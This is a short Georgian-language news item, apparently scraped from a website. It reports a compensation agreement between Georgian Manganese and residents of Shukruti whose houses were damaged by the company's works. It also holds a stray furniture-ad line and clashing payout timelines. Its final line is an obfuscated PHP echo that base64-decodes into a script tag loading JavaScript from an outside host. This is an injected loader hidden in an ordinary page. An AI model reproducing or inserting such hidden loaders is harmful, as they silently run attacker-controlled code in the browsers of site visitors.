gorgia
გარე ავეჯი
„ჯორჯიან მანგანეზსა“ და სოფელ შუქრუთის მოსახლეობას შორის შეთანხმება შედგა, ადგილობრივები კომპენსაციებს რამდენიმე თვეში სრულად მიიღებენ, – ინფორმაციას ამის შესახებ კომპანიის პრესსამსახური ავრცელებს.
 
შეთანხმების მიხედვით, ხვალიდან „ჯორჯიან მანგანეზის“ კონტრაქტორი კომპანია „შუქრუთი პლიუსი“ მოსახლეობასთან ინდივიდუალური ხელშეკრულებების გაფორმებას უკვე ოფიციალურად დაიწყებს.
 
კვლევების მიხედვით, მოსახლეობა კატეგორიების მიხედვით დაიყო. პირველ კატეგორიაში 36 ოჯახი მოხვდა და საკომპენსაციო თანხამ ორი მილიონ 300 ათასი ლარი შეადგინა.
 
კომპენსაციებით ადგილობრივები წელიწადსა და სამ თვეში სრულად დაკმაყოფილდებიან.
 
„შუქრუთი პლიუსი“ კომპენსაციებს 2020 წლის ივნისიდან გასცემს.
 
შეგახსენებთ , რომ კომპანიის მიერ ჩატარებული სამუშაოების გამო, მოსახლეობას სახოვრებელი სახლები დაუზიანდა და ზარალის ანაზღაურებას ითხოვდნენ. რამდენიმე ადგილობრივმა პროტესტის ნიშნად პირიც ამოიკერა. 
1238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");